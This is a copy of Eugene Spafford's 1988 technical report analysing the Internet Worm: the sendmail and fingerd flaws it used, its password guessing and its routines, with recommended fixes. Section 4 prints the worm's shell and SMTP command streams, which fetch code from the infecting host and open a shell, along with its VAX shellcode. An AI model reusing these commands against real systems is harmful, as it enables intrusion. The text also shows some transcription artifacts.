home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 102.3 KB | 1,949 lines |
-
-
- The Internet Worm Program: An Analysis
-
- Purdue Technical Report CSD-TR-823
-
- Eugene H. Spafford
- Department of Computer Sciences Purdue University
- West Lafayette, IN 47907-2004
-
- spaf@cs.purdue.edu
-
-
- ABSTRACT
- On the evening of 2 November 1988, someone infected the Internet
- with a worm program. That program exploited flaws in utility
- programs in systems based on BSD-derived versions of UNIX. The
- flaws allowed the program to break into those machines and copy
- itself, thus infecting those systems. This infection eventually
- spread to thousands of machines, and disrupted normal activities
- and Internet connectivity for many days. This report gives a
- detailed description of the components of the worm
- program\320data and functions. It is based on study of two
- completely independent reverse-compilations of the worm and a
- version disassembled to VAX assembly language. Almost no source
- code is given in the paper because of current concerns about the
- state of the ``immune system'' of Internet hosts, but the
- description should be detailed enough to allow the reader to
- understand the behavior of the program. The paper contains a
- review of the security flaws exploited by the worm program, and
- gives some recommendations on how to eliminate or mitigate their
- future use. The report also includes an analysis of the coding
- style and methods used by the author\(s\) of the worm, and draws
- some conclusions about his abilities and intent.
-
- Copyright 1988 by Eugene H. Spafford. All rights reserved.
-
- Permission is hereby granted to make copies of this work, without
- charge, solely for the purposes of instruction and research. Any
- such copies must include a copy of this title page and copyright
- notice. Any other reproduction, publication, or use is strictly
- prohibited without express written permission. November 29, 1988
-
- The Internet Worm Program: An Analysis
- Purdue Technical Report CSD-TR-823
- Eugene H. Spafford
- Department of Computer Sciences
- Purdue University West Lafayette, IN 47907-2004
-
- spaf@cs.purdue.edu
-
- Introduction
- On the evening of 2 November 1988 the Internet came under attack
- >From within. Sometime round 6 PM EST, a program was executed on
- one or more hosts connected to the Internet. This program
- collected host, network, and user information, then broke into
- other machines ???using flaws present in those systems' software.
- After breaking in, the program would replicate itself and the
- replica would also attempt to infect other systems. Although the
- program would only infect Sun Microsystems Sun 3 systems, and VAX
- computers running variants of 4 BSD UNIX the program spread
- quickly, as did the confusion and consternation of system
- administrators and users as they discovered that their systems
- had been infected. Although UNIX has long been known to have some
- security weaknesses \(cf. [Ritc79], [Gram84], and [Reid87]\), the
- scope of the breakins came as a great surprise to almost
- everyone. he program was mysterious to users at sites where it
- appeared. Unusual files were left in the usr/tmp directories of
- some machines, and strange messages appeared in the log files of
- some of the utilities, such as the sendmail mail handling agent.
- The most noticeable effect, however, was that systems became more
- and more loaded with running processes as they became repeatedly
- infected. As time went on, some of these machines became so
- loaded that they were unable to continue any processing; some
- machines failed completely when their swap space or process
- tables were exhausted. By late Thursday night, personnel at the
- University of California at Berkeley and at Massachusetts
- Institute of Technology had ``captured'' copies of the program
- and began to analyze it. People at other sites also began to
- study the program and were developing methods of eradicating it.
- A common fear was that the program was somehow tampering with
- system resources in a way that could not be readily detected and
- that while a cure was being sought, system files were being
- altered or information destroyed. By 5 AM EST Thursday morning,
- less than 12 hours after the infection started on the network,
- the Computer Systems Research Group at Berkeley had developed an
- interim set of steps to halt its spread. This included a
- preliminary patch to the sendmail mail agent, and the suggestion
- to rename one or both of the C compiler and loader to prevent
- their use. These suggestions were published in mailing lists and
- on the usenet, although their spread was hampered by systems
- disconnecting from the Internet to attempt a ``quarantine.''
- By about 7 PM EST Thursday, another simple, effective method of
- stopping the infection, without renaming system utilities, was
- discovered at Purdue and also widely published. Software patches
- were posted by the Berkeley group at the same time to mend all
- the flaws that enabled the program to invade systems. All that
- remained was to analyze the code that caused the problems. On
- November 8, the National Computer Security Center held a
- hastily-convened workshop in Baltimore. The topic of discussion
- was the program and what it meant to the internet community. Who
- was at that meeting and why they were invited, and the topics
- discussed have not yet been made public.
-
- However, one thing we know that was decided by those present at
- the meeting was that they would not distribute copies of their
- reverse-engineered code to the general public. It was felt that
- the program exploited too many little-known techniques and that
- making it generally available would only provide other attackers
- a framework to build another such program. Although such a stance
- is well-intended, it can serve only as a delaying tactic. As of
- November 27, I am aware of at least five versions of the
- decompiled code, and because of the widespread distribution of
- the binary, I am sure there are at least ten times that many
- versions already completed or in progress and the required skills
- and tools are too readily available within the community to
- believe that only a few groups have the capability to reconstruct
- the source code. any system administrators, programmers, and
- managers are interested in how the program managed to establish
- itself on their systems and spread so quickly These individuals
- have valid interest in seeing the code, especially if they are
- software vendors. Their interest is not to duplicate the program,
- but to be sure that all the holes used by the program are
- properly plugged. Furthermore, examining the code may help
- administrators and vendors develop defenses against future
- attacks, despite the claims to the contrary by some of the
- individuals with copies of the reverse-engineered code. This
- report is intended to serve an interim role in this process. It
- is a detailed description of how the program works, but does not
- provide source code that could be used to create a new worm
- program. As such, this should be an aid to those individuals
- seeking a better understanding of how the code worked, yet it is
- in such a form that it cannot be used to create a new worm
- without considerable effort. Section 3 and Appendix C contain
- specific observations about some of the flaws in the system
- exploited by the program, and their fixes. A companion report, to
- be issued in a few weeks, will contain a history of the worm's
- spread through the Internet. This analysis is the result of a
- study performed on three separate reverse-engineered versions of
- the worm code. Two of these versions are in C code, and one in
- VAX assembler. All three agree in all but the most minor details.
- One C version of the code compiles to binary that is identical to
- the original code, except for minor differences of no
- significance. As such, I can state with some certainty that if
- there was only one version of the worm program, then it was
- benign in intent. The worm did not write to the file system
- except when transferring itself into a target system. It also did
- not transmit any information from infected systems to any site,
- other than copies of the worm program itself. Since the Berkeley
- Computer Systems Research Group as already published official
- fixes to the flaws exploited by the program, we do not have to
- worry about these specific attacks being used again. Many vendors
- have also issued appropriate patches. It now remains to convince
- the remaining vendors to issue fixes, and users to install them.
-
- Terminology
-
- There seems to be considerable variation in the names applied to
- the program described in this paper. I use the term worm instead
- of virus based on its behavior. Members of the press have used
- the term virus, possibly because their experience to date has
- been only with that form of security problem. This usage has been
- reinforced by quotes from computer managers and programmers also
- unfamiliar with the terminology. For purposes of clarifying the
- terminology, let me define the difference between these two terms
- and give some citations to their origins: worm is a program that
- can run by itself and can propagate a fully working version of
- itself to other machines. It is derived from the word tapeworm, a
- parasitic organism that lives inside a host and saps its
- resources to maintain itself. virus is a piece of code that adds
- itself to other programs, including operating systems. it cannot
- run independently and it requires that its ``host'' program be
- run to activate it. As such, it has a clear analog to biological
- viruses and those viruses are not considered alive in the usual
- sense; instead, they invade host cells and corrupt them, causing
- them to produce new viruses. The program that was loosed on the
- Internet was clearly a worm.
-
- 2.1. Worms
-
- The concept of a worm program that spreads itself from machine to
- (machine was apparently first described by John Brunner in 1975
- in his classic science fiction novel The Shockwave Rider.
- [Brun75] He called these programs tapeworms that lived
- ``inside'' the computers and spread themselves to other
- machines. In 1979-1981, researchers at Xerox PARC built and
- experimented with worm programs. They reported their experiences
- in an article in 1982 in Communications of the ACM. [Shoc82] The
- worms built at PARC were designed to travel from machine to
- machine and do useful work in a distributed environment. They
- were not used at that time to break into systems, although some
- did ``get away'' during the tests. A few people seem to prefer to
- call the Internet Worm a virus because it was destructive, and
- they believe worms are non-destructive. Not everyone agrees that
- the Internet Worm was destructive, however. Since intent and
- effect are sometimes difficult to judge, using those as a naming
- criterion is clearly insufficient. As such, worm continues to be
- the clear choice to describe this kind of program.
-
- 2.2. Viruses
-
- The first (use of the word virus \(to my knowledge\) to describe
- something that infects a computer was by David Gerrold in his
- science fiction short stories about the G.O.D. machine. These
- stories were later combined and expanded to form the book
- When Harlie Was One. [Gerr72] (A subplot in that book described a
- program named VIRUS created by an unethical scientist. A
- computer infected with VIRUS would randomly dial the phone until
- it found another computer. It would then break into that system
- and infect it with a copy of VIRUS. This program would infiltrate
- the system software and slow the system down so much that it
- became unusable except to infect other machines\). The inventor
- had plans to sell a program named VACCINE that could cure VIRUS
- and prevent infection, but disaster occurred when noise on a
- phone line caused VIRUS to mutate so VACCINE ceased to be
- effective. The term computer virus was first used in a formal
- way by Fred Cohen at USC. [Cohe84] He defined the term to mean
- a security problem that attaches itself to other code and turns
- it into something that produces viruses; to quote from his
- paper: ``We define a computer `virus' as a program that can
- infect other programs by modifying them to include a possibly
- evolved copy of itself.'' He claimed the first computer virus was
- ``born'' on November 3, 1983, written by himself for a security
- seminar course.
-
- The interested reader may also wish to consult [Denn88] and
- [Dewd85] for further discussion of the terms.
-
- 3. Flaws and Misfeatures
-
- 3.1. Specific Problems
-
- The actions of the Internet Worm exposed some specific security
- flaws in standard services provided by BSD-derived versions of
- UNIX. Specific patches for these flaws have been widely
- circulated in days since the worm program attacked the Internet.
- Those flaws and patches are discussed here.
-
- 3.1.1. fingerd and gets
-
- The finger program is a utility that allows users to obtain
- information about other users. It is usually used to identify
- the full name or login name of a user, whether or not a user is
- currently logged in, and possibly other information about the
- person such as telephone numbers where he or she can be reached.
- The fingerd program is intended to run as a daemon, or background
- process, to service remote requests using the finger protocol.
- [Harr77] The bug exploited to break fingerd involved overrunning
- the buffer the daemon used for input. The standard C library has
- a few routines that read input without checking for bounds on
- the buffer involved. In particular, the gets call takes input to
- a buffer without doing any bounds checking; this was the call
- exploited by the worm. The gets routine is not the only routine
- with this flaw. The family of routines scanf/fscanf/sscanf may
- also overrun buffers when decoding input unless the user
- explicitly specifies limits on the number of characters to be
- converted. Incautious use of the sprintf routine can overrun
- buffers. Use of the strcat/strcpy calls instead of the
- strncat/strncpy routines may also overflow their buffers.
- Although experienced C programmers are aware of the problems with
- these routines, they continue to use them. Worse, their format
- is in some sense codified not only by historical inclusion in
- UNIX and the C language, but more formally in the forthcoming
- ANSI language standard for C. The hazard with these calls is
- that any network server or privileged program using them may
- possibly be compromised by careful precalculation of the
- inappropriate input. An important step in removing this hazard
- would be first to develop a set of replacement calls that accept
- values for bounds on their program-supplied buffer arguments.
- Next, all system servers and privileged applications should be
- examined for unchecked uses of the original calls, with those
- calls then being replaced by the new bounded versions. Note that
- this audit has already been performed by the group at Berkeley;
- only the fingerd and timed servers used the gets call, and
- patches to fingerd have already been posted. Appendix C contains
- a new version of fingerd written specifically for this report
- that may be used to replace the original version. This version
- makes no calls to gets.
-
- 3.1.2. Sendmail
-
- The sendmail program is a mailer designed to route mail in a
- heterogeneous internetwork. [Allm83] The program operates in a
- number of modes, but the one of most interest is when it is
- operating as a daemon process. In this mode, the program is
- ``listening'' on (a TCP port \(#25\) for attempts to deliver
- mail using standard Internet protocols, principally SMTP
- \(Simple Mail Transfer Protocol\). [Post82] When such a request
- is detected, the daemon enters into a dialog with the remote
- mailer to determine sender, recipient, delivery instructions, and
- message contents. The bug exploited in sendmail had to do with
- functionality provided by a debugging option in the code. The
- worm would issue the DEBUG command to sendmail and then specify
- a set of commands instead of a user address as the recipient of
- the message. Normally, this (is not allowed, but it is present
- in the debugging code to allow testers to verify that mail is
- arriving at a particular site without the need to activate the
- address resolution routines. The debug option of sendmail is
- often used because of the complexity of configuring the mailer
- for local conditions, and many vendors and site administrators
- leave the debug option compiled in. The sendmail program is of
- immense importance on most Berkeley-derived \(and other\) UNIX
- systems because it handles the complex tasks of mail routing and
- delivery. Yet, despite its importance and wide-spread use, most
- system administrators (know little about how it works. Stories
- are often related about how system administrators will attempt to
- write new device drivers or otherwise modify the kernel of the
- OS, yet they will not willingly attempt to modify sendmail or
- its configuration files. It is little wonder, then, that bugs
- are present (in sendmail that allow unexpected behavior. Other
- flaws have been found and reported now that attention has been
- focused on the program, but it is not known for sure if all the
- bugs have been discovered and all the patches circulated. One
- obvious approach would be to dispose of sendmail and come (up
- with a simpler program to handle mail. Actually, for purposes
- of verification, developing a suite of cooperating programs
- would be a better approach, and more aligned with the UNIX
- philosophy. In effect, sendmail is fundamentally flawed, not
- because of anything related to function, (but because it is too
- complex and difficult to understand.
-
- The Berkeley Computer Systems Research Group has a new version of
- sendmail with many bug fixes and fixes for security flaws. This
- version of sendmail is available for FTP from the host
- ``ucbarpa.berkeley.edu'' and will be present in the file
- ~ftp/pub/sendmail.tar.Z by the end of November 1988. Note that
- this version is shipped with the DEBUG option disabled by
- default. However, this does not help system administrators who
- wish to enable the DEBUG option, although the researchers at
- Berkeley believe they have fixed (all the security flaws
- inherent in that facility. One approach that could be taken with
- the program would be to have it prompt the user for the password
- of the super user \(root\) when the DEBUG command is given. A
- static password should never be compiled into the program because
- (this would mean that the same password might be present at
- multiple sites and seldom changed. For those sites without
- access to FTP or otherwise unable to obtain the new version, the
- official patches to sendmail are enclosed in Appendix D.
-
- 3.2. Other Problems
-
- Although the worm exploited flaws in only two server programs,
- its behavior has served to illustrate a few fundamental problems
- that have not yet been widely addressed. In the interest of
- promoting better security, some of these problems are discussed
- here. (The interested reader is directed to works such as
- [Gram84] for a broader discussion of related issues.
-
- 3.2.1. Servers in general
-
- A security flaw not exploited by the worm, but now becoming
- obvious, is that many system services have configuration and
- command files owned by the same userid. Programs like sendmail,
- the at service, and other facilities are often all owned by the
- same (non-user id. This means that if it is possible to abuse
- one of the services, it might be possible to abuse many. One way
- to deal with the general problem is have every daemon and
- subsystem run with a separate userid. That way, the command and
- data files for each subsystem could (be protected in such a way
- that only that subsystem could have write \(and perhaps read\)
- access to the files. This is effectively an implementation of
- the principle of least privilege. Although doing this might add
- an extra dozen user ids to the system, it is a small (cost to
- pay, and is already sup ported in the UNIX paradigm. Services
- that should have separate ids include sendmail, news, at,
- finger, ftp, uucp and YP.
-
- 3.2.2. Passwords
-
- A key attack of the worm program involved attempts to discover
- user passwords. It was able to determine success because the
- encrypted password of each user was in a publicly readable file.
- This allows an attacker to encrypt lists of possible passwords
- and then compare them against the actual passwords without
- passing through any system function. In effect, the security of
- the passwords is provided in large part by the prohibitive effort
- of trying all combinations of letters. Unfortunately, as machines
- get faster, the cost of such attempts decreases. Dividing the
- task among multiple processors further reduces the time needed to
- decrypt a password. It (is currently feasible to use a
- supercomputer to precalculate all probable passwords and store
- them on optical media. Although not \(currently\) portable, this
- scheme would allow someone with the appropriate resources access
- to any account for which they could read the password field and
- then consult (their database of pre-encrypted passwords. As the
- density of storage media increases, this problem will only get
- more severe. A clear approach to reducing the risk of such
- attacks, and an approach that has already been taken in some
- variants of UNIX, would be to have a (shadow) password file. The
- encrypted passwords are saved in a file that is readable only by
- the system administrators, and a privileged call performs
- password encryptions and comparisons with an appropriate delay
- \(.5 to 1 second, for instance\). This would prevent any attempt
- to ``fish'' for passwords. Additionally, a threshold could be
- included to check for repeated password attempts from the same
- process, resulting in some form of alarm being raised. Shadow
- password files should be used in combination with encryption
- rather than in place of such techniques, however, or one problem
- is simply replaced by a different one; the combination of the
- two methods is stronger than either one alone. Another way to
- strengthen the password mechanism would be to change the utility
- that sets user passwords. The utility currently makes minimal
- attempt to ensure that new passwords are nontrivial to guess. The
- program could be strengthened in such a way that it would reject
- any choice of a word currently in the on-line dictionary or based
- on the account name.
-
- 4. High-Level Description of the Worm
-
- This section contains a high-level overview of how the worm
- program functions. The description in this section assumes that
- the reader is familiar with UNIX and somewhat familiar with
- network facilities under UNIX. Section 5 describes the individual
- functions and structures in more detail. The worm consists of
- two parts: a main program, and a bootstrap or vector program
- \(described in Appendix B\). We will start our description from
- the point at which a host is about to be infected. At this
- point, a worm running on another machine has either succeeded in
- establishing a shell on the new host and has connected back to
- the infecting machine via a TCP connection, or it has connected
- to the SMTP port and is transmitting to the sendmail program.
- The infection proceeded as follows: 1\) A socket was established
- on the infecting machine for the vector program to connect to
- \(e.g., socket number 32341\). A challenge string was constructed
- >From a random number \(e.g., 8712440\). A file name base was
- also constructed using a random number \(e.g., 14481910\). 2\)
- The vector program was installed and executed using one of two
- methods: 2a\) Across a TCP connection to a shell, the worm would
- send the following commands \(the two lines beginning with
- ``cc'' were sent as a single line\):
- PATH=/bin:/usr/bin:/usr/ucb cd /usr/tmp echo gorch49; sed '/int
- zz/q' > x14481910.c;echo gorch50 [text of vector
- program\320enclosed in Appendix B] int zz; cc (-o x14481910
- x14481910.c;./x14481910 128.32.134.16 32341 8712440; rm -f
- x14481910 x14481910.c;echo DONE
- Then it would wait for the string ``DONE'' to signal that the
- vector program was running. 2b\) Using the SMTP connection, it
- would transmit \(the two lines beginning with ``cc'' were sent
- as a single line\):
- debug mail from: </dev/null> rcpt to: <"|sed -e '1,/^$/'d |
- /bin/sh ; exit 0"> data cd /usr/tmp cat > x14481910.c <<'EOF'
- [text of vector program\320enclosed in Appendix III] EOF cc -o
- x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440; rm
- -f x14481910 x14481910.c . quit
-
- The infecting worm would then wait for up to 2 minutes on
- the designated port for the vector to contact it. 3\) The vector
- program then connected to the ``server,'' sent the challenge
- string, and transferred three files: a Sun 3 binary version of
- the worm, a VAX version, and the source code for the vector
- program. After the files were copied, the running vector program
- became \(via the execl call\) the shell with its input and output
- still connected to the server worm. 4\) The server worm sent
- the following command stream to the connected shell:
- PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then
- P=x14481910 else P=sh fi
- Then, for each binary file it had transferred \(just two in this
- case, although the code is written (to allow more\), it would
- send the following form of command sequence:
- cc -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3.o
- x14481910,vax.o x14481910,l1.c rm -f $P
- The rm would succeed only if the linked version of the worm
- failed to start execution. If the server determined that the
- host was now infected, it closed the connection. Otherwise, it
- would try the other binary file. After both binary files had been
- tried, it would send over rm commands for the object files to
- clear away all evidence of the attempt at infection. 5\) The new
- worm on the infected host proceeded to ``hide'' itself by
- obscuring its argument vector, unlinking the binary version of
- itself, and killing its parent \(the $$ argument in the
- invocation\). It then read into memory each of the worm binary
- files, encrypted each file after reading it, and deleted the
- files from disk. 6\) Next, the new worm gathered information
- about network interfaces and hosts to which the local machine
- was connected. It built lists of these in memory, including
- information about canonical and alternate names and addresses.
- It gathered some of this information by making direct
- ioctl calls, and by running the netstat program with various
- arguments. It also read through various system files looking for
- host names to add to its database. 7\) It randomized the lists
- it constructed, then attempted to infect some of those hosts. For
- directly connected networks, it created a list of possible host
- numbers and attempted to infect those hosts if they existed.
- Depending on the type of host \(gateway or local network\), the
- worm first tried to establish a connection on the telnet or rexec
- ports to determine reachability before it attempted one of the
- infection methods. 8\) The infection attempts proceeded by one
- of three routes: rsh, fingerd, or sendmail. 8a\) The attack via
- rsh was done by attempting to spawn a remote shell by invocation
- of \(in order of trial\) /usr/ucb/rsh, /usr/bin/rsh, and
- /bin/rsh. If successful, the host was infected as in steps 1 and
- 2a, above. 8b\) The attack via the finger daemon was somewhat
- more subtle. A connection was established to the remote finger
- server daemon and then a specially constructed string of 536
- bytes was passed to the daemon, overflowing its input buffer and
- overwriting parts of the stack. For standard 4 BSD versions
- running on VAX computers, the overflow resulted in the return
- stack frame for the main routine being changed so that the
- return address pointed into the buffer on the stack. The
- instructions that were written into the stack at that location
- were: pushl $68732f '/sh\\0' pushl $6e69622f '/bin' movl sp,
- r10 pushrl $0 pushrl $0 pushrl r10 pushrl $3 movl sp,ap
- chmk $3b That (is, the code executed when the main routine
- attempted to return was: execve\("/bin/sh", 0, 0\) On VAXen,
- this resulted in the worm connected to a remote shell via the TCP
- connection. The worm then proceeded to infect the host as in
- steps 1 and 2a, (above. On Suns, this simply resulted in a core
- file since the code was not in place to corrupt a Sun version of
- fingerd in a similar fashion. 8c\) The worm then tried to infect
- the remote host by establishing a connection to the SMTP port
- and mailing an (infection, as in step 2b, above. Not all the
- steps were attempted. As soon as one method succeeded, the host
- entry in the internal list was marked as infected and the other
- methods were not attempted. 9\) Next, it entered a state machine
- consisting of five states. Each state (was run for a short
- while, then the program looped back to step #7 \(attempting to
- break into other hosts via sendmail, finger, or rsh \). The first
- four of the five states were attempts to break into user
- accounts on the local machine. The fifth state was the final
- state, and occurred after all attempts had been made to break
- all passwords. In the fifth state, the worm looped forever
- trying to infect hosts in its internal tables and marked as not
- yet infected. The four states were: 9a\) The worm read through
- the /etc/hosts.equiv files and /.rhosts files to find the names
- of equivalent hosts. These were marked in the internal table of
- hosts. Next, the worm read the /etc/passwd file into an internal
- data structure. As it was doing this, it also examined
- the .forward file in each user home directory and included those
- host names in its internal table of hosts to try. Oddly, it did
- not similarly check user .rhosts files. 9b\) The worm attempted
- to break each user password using simple choices. The worm
- checked the obvious case of no password. Then, it used the
- account name and GECOS field to try simple passwords. Assume
- that the user had an entry in the password file like:
- account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh then
- the words tried as potential passwords would be account,
- accountaccount, User, Name, user, name, and tnuocca. These are,
- respectively, the account name, the account name concatenated
- with itself, the first and last names of the user, the user
- names with leading capital letters turned to lower case, and the
- account name reversed. Experience described in [Gram84]
- indicates that on systems where users are naive about password
- security, these choices may work for up to 30% of user passwords.
- Step 10 in this section describes what was done if a password
- ``hit'' was achieved. 9c\) The third stage in the process
- involved trying to break the password of each user by trying
- each word present in an internal dictionary of words \(see
- Appendix I\). This dictionary of 432 words was tried against
- each account in a random order, with ``hits'' being handled as
- described in step 10, below. 9d\) The fourth stage was entered
- if all other attempts failed. For each word in the file
- /usr/dict/words, the worm would see if it was the password to any
- account. In addition, if the word in the dictionary began with an
- upper case letter, the letter was converted to lower case and
- that word was also tried against all the passwords. 10\) Once a
- password was broken for any account, the worm would attempt to
- break into remote machines where that user had accounts. The
- worm would scan the .forward and .rhosts files of the user at
- this point, and identify the names of remote hosts that had
- accounts used by the target user. It then attempted two attacks:
- 10a\) The worm would first attempt to create a remote shell using
- the rexec service. The attempt would be made using the account
- name given in the .forward or .rhosts file and the user's local
- password. This took advantage of the fact that users often have
- the same password on their accounts on multiple machines. 10b\)
- The worm would do a rexec to the current host \(using the local
- user name and password\) and would try a rsh command to the
- remote host using the username taken from the file. This attack
- would succeed in those cases where the remote machine had a
- hosts.equiv file or the user had a .rhosts file that allowed
- remote execution without a password. If the remote shell was
- created either way, the attack would continue as in steps 1 and
- 2a, above. No other use was made of the user password.
- Throughout the execution of the main loop, the worm would check
- for other worms running on the same machine. To do this, the worm
- would attempt to connect to another worm on a local,
- predetermined TCP socket.
- 9
- If such a connection succeeded, one worm would \(randomly\) set its
- pleasequit variable to 1, causing that worm to exit after it had
- reached partway into the third stage of password cracking. This
- delay is part of the reason many systems had multiple worms
- running: even though a worm would check for other local worms, it
- would defer its self-destruction until significant effort had
- been made to break local passwords. One out of every seven worms
- would become immortal rather than check for other local worms.
- This was probably done to defeat any attempt to put a fake worm
- process on the TCP port to kill existing worms. It also
- contributed to the load of a machine once infected. The worm
- attempted to send an UDP packet to the host ernie.berkeley.edu
- 10
- approximately once every 15 infections, based on a random number
- comparison. The code to do this was incorrect, however, and no
- information was ever sent. Whether this was the intended ruse or
- whether there was actually some reason for the byte to be sent is
- not currently known. However, the code is such that an
- uninitialized byte is the intended message. It is possible that
- the author eventually intended to run some monitoring program on
- ernie \(after breaking into an account, no doubt\). Such a
- program could obtain the sending host number from the single-byte
- message, whether it was sent as a TCP or UDP packet. However, no
- evidence for such a program has been found and it is possible
- that the connection was simply a feint to cast suspicion on
- personnel at Berkeley. The worm would also fork itself on a
- regular basis and kill its parent. This served two purposes.
- First, the worm appeared to keep changing its process id and no
- single process accumulated excessive amounts of cpu time.
- Secondly, processes that have been running for a long time have
- their priority downgraded by the scheduler. By forking, the new
- process would regain normal scheduling priority. This mechanism
- did not always work correctly, either, as we locally observed
- some instances of the worm with over 600 seconds of accumulated
- cpu time. If the worm ran for more than 12 hours, it would flush
- its host list of all entries flagged as being immune or already
- infected. The way hosts were added to this list implies that a
- single worm might reinfect the same machines every 12 hours.
-
- 5. A Tour of the Worm
-
- The following is a brief, high-level description of the routines
- present in the worm code. The description covers all the
- significant functionality of the program, but does not describe
- all the auxiliary routines used nor does it describe all the
- parameters or algorithms involved. It should, however, give the
- user a complete view of how the worm functioned.
-
- 5.1. Data Structures
-
- The worm had a few global data structures worth mentioning.
- Additionally, the way it handled some local data is of interest.
-
- 5.1.1. Host list
-
- The worm constructed a linked list of host records. Each record
- contained an array of 12 character pointers to allow storage of
- up to 12 host names/aliases. Each record also contained an array
- of six long unsigned integers for host addresses, and each record
- contained a flag field. The only flag bits used in the code
- appear to be 0x01 \(host was a gateway\), 0x2 \(host has been
- infected\), 0x4 \(host cannot be infected \320 not reachable, not
- UNIX, wrong machine type\), and 0x8 \(host was ``equivalent'' in
- the sense that it appeared in a context like .rhosts file\).
-
- 5.1.2. Gateway List
-
- The worm constructed a simply array of gateway IP addresses
- through the use of the system netstat command. These addresses
- were used to infect directly connected networks. The use of the
- list is described in the explanation of scan_gateways and
- rt_init, below.
-
- 5.1.3. Interfaces list
-
- An array of records was filled in with information about each
- network interface active on the current host. This included the
- name of the interface, the outgoing address, the netmask, the
- destination host if the link was point-to-point
- 11
- , and the interface flags.
-
-
- 5.1.4. Pwd
-
- A linked list of records was built to hold user information. Each
- structure held the account name, the encrypted password, the
- home directory, the gecos field, and a link to the next record.
- A blank field was also allocated for decrypted passwords as they
- were found.
-
- 5.1.5. objects
-
- The program maintained an array of ``objects'' that held the
- files that composed the worm. Rather than have the files stored
- on disk, the program read the files into these internal
- structures. Each record in the list contained the suffix of the
- file name \(e.g., ``sun3.o''\), the size of the file, and the
- encrypted contents of the file. The use of this structure is
- described below.
-
- 5.1.6. Words
-
- A mini-dictionary of words was present in the worm to use in
- password guessing \(see Appendix A\). The words were stored in
- an array, and every word was masked \(XOR\) with the bit pattern
- 0x80. Thus, the dictionary would not show up with an invocation
- of the strings program on the binary or object files.
-
- 5.1.7. Embedded Strings
-
- Every text string used by the program, without exception, was
- masked \(XOR\) with the bit pattern 0x81. Every time a string
- was referenced, it was referenced via a call to XS. The XS
- function decrypted the requested string in a static circular
- buffer and returned a pointer to the decrypted version. This
- also kept any of the text strings in the program from appearing
- during an invocation of strings. Simply clearing the high order
- bit \(e.g., XOR 0x80\) or displaying the program binary would
- not produce intelligible text. All references to XS have been
- omitted from the following text; realize that every string was
- so encrypted. It is not evident how the strings were placed in
- the program in this manner. The masked strings were present
- inline in the code, so some preprocessor or a modified version of
- the compiler must have been used. This represents a significant
- effort by the author of the worm, and suggests quite strongly
- that the author wanted to complicate or prevent the analysis of
- the program once it was discovered.
-
- 5.2. Routines
-
- The descriptions given here are arranged in alphabetic order. The
- names of some routines are exactly as used by the author of the
- code. Other names are based on the function of the routine, and
- those names were chosen because the original routines were
- declared static and name information was not present in the
- object files. If the reader wishes to trace the functional \257ow
- of the worm, begin with the descriptions of routines main and
- doit \(presented first for this reason\). By function, the
- routines can be \(arbitrarily\) grouped as follows: setup and
- utility : main, doit, crypt, h_addaddr, h_addname, h_addr2host,
- h_clean, h_name2host, if_init, loadobject, makemagic, netmaskfor,
- permute, rt_init, supports_rsh, and supports_telnet. network &
- password attacks : attack_network, attack_user, crack_0, crack_1,
- crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect,
- scan_gateways, sendworm, try_fingerd, try_password, try_rsh,
- try_sendmail, and waithit. camouflage: checkother, other_sleep,
- send_message, and xorbuf.
-
- 5.2.1. main
-
- This was where the program started. The first thing it did was
- change its argument vector to make it look like it was the shell
- running. Next, it set its resource limits so a failure would not
- drop a core file. Then it loaded all the files named on the
- command line into the object structure in memory using calls to
- loadobject. If the file was not one of the objects loaded, the
- worm would immediately call exit. Next, the code unlinked all the
- object files, the file named sh \(the worm itself\), and the file
- /tmp/.dumb \(apparently a remnant of some earlier version of the
- program, possibly used as a restraint or log during
- testing\320the file is not otherwise referenced\). The program
- then finished zeroing out the argument vector. Next, the code
- would call if_init. If no interfaces were discovered by that
- routine, the program would call exit. The program would then get
- its current process group. If the process group was the same as
- its parent process id \(passed on the command line\), it would
- reset its process group and send a KILL signal to its parent.
- Last of all, the routine doit was invoked.
-
- 5.2.2. doit
-
- This was the main worm code. First, a variable was set to the
- current time with a call to time, and the random number generator
- was initialized with the return value. Next, the routines hg and
- hl were invoked to infect some hosts. If one or both of these
- failed to infect any hosts, the routine ha was invoked. Next, the
- routine checkother was called to see if other worms were on this
- host. The routine send_message was also called to cast suspicion
- on the folks at Berkeley.
-
- 12
- The code then entered an infinite loop: A call would be made to
- cracksome followed by a call to other_sleep with a parameter of
- 30. Then cracksome would be called again. At this point, the
- process would fork itself, and the parent would exit, leaving the
- child to continue. Next, the routines hg, ha, and hi would all be
- called to infect other hosts. If any one \(or combination\) of
- these routines failed to infect a new host, the routine hl would
- be called to infect a local host. Thus, the code was aggressive
- about always infecting at least one host each pass through this
- loop. The logic here was faulty, however, because if all known
- gateway hosts were infected, or a bad set of host numbers were
- tried in ha, this code would call hl every time through the loop.
- Such behavior was one of the reasons hosts became overloaded with
- worm processes: every pass through the loop, each worm would
- likely be forced to infect another local host. Considering that
- multiple worms could run on a host for some time before one would
- exit, this could lead to an exponential growth of worms in a LAN
- environment. Next, the routine other_sleep was called with a
- timeout of 120. A check was then made to see if the worm had run
- for more than 12 hours. If so, a call was made to h_clean.
- Finally, a check was made of the pleasequit and nextw variables
- \(set in other_sleep or checkother, and crack_2, respectively\).
- If pleasequit was nonzero, and nextw was greater than 10, the
- worm would exit.
-
- 5.2.3. attack_network
-
- This routine was designed to infect random hosts on a subnet.
- First, for each of the network interfaces, if checked to see if
- the target host was on a network to which the current host was
- directly connected. If so, the routine immediately returned.
- 13
- Based on the class of the netmask \(e.g., Class A, Class B\), the
- code constructed a list of likely network numbers. A special
- algorithm was used to make good guesses at potential Class A host
- numbers. All these constructed host numbers were placed in a
- list, and the list was then randomized using permute. If the
- network was Class B, the permutation was done to favor low-
- numbered hosts by doing two separate permutations\320the first
- six hosts in the output list were guaranteed to be chosen from
- the first dozen \(low-numbered\) host numbers generated. The
- first 20 entries in the permuted list were the only ones
- examined. For each such IP address, its entry was retrieved from
- the global list of hosts \(if it was in the list\). If the host
- was in the list and was marked as already infected or immune, it
- was ignored. Otherwise, a check was made to see if the host
- supported the rsh command \(identifying it as existing and having
- BSD-derived networking services\) by calling supports_rsh. If the
- host did support rsh, it was entered into the hosts list if not
- already present, and a call to infect was made for that host. If
- a successful infection occurred, the routine returned early with
- a value of TRUE \(1\).
-
